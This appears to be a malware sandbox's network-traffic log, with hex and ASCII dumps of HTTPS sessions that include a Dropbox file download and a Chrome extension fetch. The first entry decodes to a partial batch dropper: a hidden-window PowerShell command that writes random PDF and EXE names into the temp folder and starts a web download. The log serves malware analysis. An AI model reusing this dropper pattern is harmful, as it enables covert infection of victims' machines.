2024-12-19 12:44:34 UTC	797	IN	Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 49 6e 64 6f 57 53 74 59 4c 65 20 68 69 44 64 65 4e 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 43 6f 6d 6d 61 6e 64 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 70 64 66 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 4a 6f 69 6e 2d 50 61 74 68 20 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 2d 43 68 69 6c 64 50 61 74 68 20 28 27 7b 30 7d 2e 65 78 65 27 20 2d 66 20 28 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 29 29 3b 20 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 Data Ascii: @echo offpowershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -U

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:32 UTC	764	OUT	GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1 Host: www.dropbox.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-19 12:44:33 UTC	3875	IN	HTTP/1.1 200 OK Content-Security-Policy: connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-src https:// carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/ [TRUNCATED] Content-Type: text/html; charset=utf-8 Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; Path=/; Expires=Tue, 18 Dec 2029 12:44:33 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=HdS8vQAOgoo2pdq3Kdn8X0eJ; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:33 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; Path=/; Expires=Fri, 19 Dec 2025 12:44:33 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=0FAEIkEix0; Path=/; Expires=Fri, 19 Dec 2025 12:44:33 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:33 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Date: Thu, 19 Dec 2024 12:44:33 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: d23cbb1880f84f85afefc10443038bea Connection: close Transfer-Encoding: chunked
2024-12-19 12:44:33 UTC	792	IN	Data Raw: 36 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6d 61 65 73 74 72 6f 20 67 6c 6f 62 61 6c 2d 68 65 61 64 65 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 0d 0a 36 0d 0a 3c 68 65 61 64 3e 0d 0a 31 39 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 0d 0a 34 31 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6d 61 67 65 69 6e 64 65 78 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 2f 3e 0a 0d 0a 34 37 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 Data Ascii: 67<!DOCTYPE html><html class="maestro global-header" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">6<head>19<meta charset="utf-8" />41<meta content="noindex, nofollow, noimageindex" name="robots" />47<meta content="width=device-w
2024-12-19 12:44:33 UTC	617	IN	Data Raw: 62 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 66 6f 75 6e 64 61 74 69 6f 6e 2d 76 66 6c 48 36 77 77 77 76 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 64 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 74 Data Ascii: b5<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/foundation-vflH6wwwv.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>d2<link rel="preload" href="https://cfl.dropboxstatic.com/static/t
2024-12-19 12:44:33 UTC	380	IN	Data Raw: 61 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6a 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 69 6e 64 65 78 2e 77 65 62 2d 76 66 6c 44 61 72 38 30 2d 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 63 33 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: ad<link rel="preload" href="https://cfl.dropboxstatic.com/static/js/file_viewer/index.web-vflDar80-.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>c3<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserve
2024-12-19 12:44:33 UTC	379	IN	Data Raw: 62 63 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 61 70 70 5f 61 63 74 69 6f 6e 73 2f 69 6e 64 65 78 2d 76 66 6c 77 77 7a 54 4e 45 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 62 33 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 Data Ascii: bc<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/app_actions/index-vflwwzTNE.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>b3<link rel="preload" href="https://cfl.dropboxstatic.com/s
2024-12-19 12:44:33 UTC	200	IN	Data Raw: 63 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 6d 61 65 73 74 72 6f 5f 61 70 70 73 68 65 6c 6c 5f 73 74 79 6c 65 73 2d 76 66 6c 66 4e 4e 4c 56 35 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a Data Ascii: c2<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_appshell_styles-vflfNNLV5.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>
2024-12-19 12:44:33 UTC	377	IN	Data Raw: 61 37 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6a 73 2f 63 6f 6d 6d 65 6e 74 73 32 2f 69 6e 64 65 78 2d 76 66 6c 51 64 76 55 48 75 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 63 36 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 Data Ascii: a7<link rel="preload" href="https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>c6<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/stat
2024-12-19 12:44:33 UTC	563	IN	Data Raw: 62 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 73 70 65 63 74 72 75 6d 2f 69 6e 64 65 78 2e 77 65 62 2d 76 66 6c 77 76 73 65 67 76 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 62 34 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f Data Ascii: bd<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/spectrum/index.web-vflwvsegv.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>b4<link rel="preload" href="https://cfl.dropboxstatic.com/
2024-12-19 12:44:33 UTC	397	IN	Data Raw: 63 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 61 62 75 73 65 2f 66 69 6e 67 65 72 70 72 69 6e 74 6a 73 5f 63 6f 6d 70 6f 6e 65 6e 74 2d 76 66 6c 54 69 7a 41 6b 66 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 62 39 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 Data Ascii: c8<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>b9<link rel="preload" href="https://cfl.dropbox
2024-12-19 12:44:33 UTC	813	IN	Data Raw: 62 31 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 6e 6f 74 69 66 79 2d 76 66 6c 34 6f 4a 76 32 53 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 36 65 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 7a 61 65 35 46 4f 61 59 34 77 67 59 6a 36 2f 51 4d 49 47 6f 61 62 70 36 69 74 34 3d 22 3e 77 69 6e 64 6f 77 2e 43 53 50 5f 53 43 52 49 50 54 5f 4e 4f 4e 43 45 Data Ascii: b1<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/notify-vfl4oJv2S.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>6e<script nonce="zae5FOaY4wgYj6/QMIGoabp6it4=">window.CSP_SCRIPT_NONCE
2024-12-19 12:44:33 UTC	487	IN	Data Raw: 66 62 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 7a 61 65 35 46 4f 61 59 34 77 67 59 6a 36 2f 51 4d 49 47 6f 61 62 70 36 69 74 34 3d 22 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 76 61 72 20 73 74 61 72 74 20 3d 20 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 52 65 71 75 69 72 65 4c 6f 61 64 43 61 6c 6c 62 61 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 45 44 49 53 4f 4e 5f 4d 45 54 52 49 43 53 5f 52 45 51 55 49 52 45 5f 4c 4f 41 44 5f 43 41 4c 4c 42 41 43 4b 5f 54 49 4d 45 20 3d 20 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 20 2d 20 73 74 61 72 74 3b 0a 20 20 20 20 7d 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e Data Ascii: fb<script nonce="zae5FOaY4wgYj6/QMIGoabp6it4=">(function () { var start = performance.now(); window.addRequireLoadCallback(function() { window.EDISON_METRICS_REQUIRE_LOAD_CALLBACK_TIME = performance.now() - start; });})();</script>

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:36 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-19 12:44:37 UTC	563	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 154477 X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Wed, 18 Dec 2024 15:58:14 GMT Expires: Thu, 18 Dec 2025 15:58:14 GMT Cache-Control: public, max-age=31536000 Age: 74782 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-19 12:44:37 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 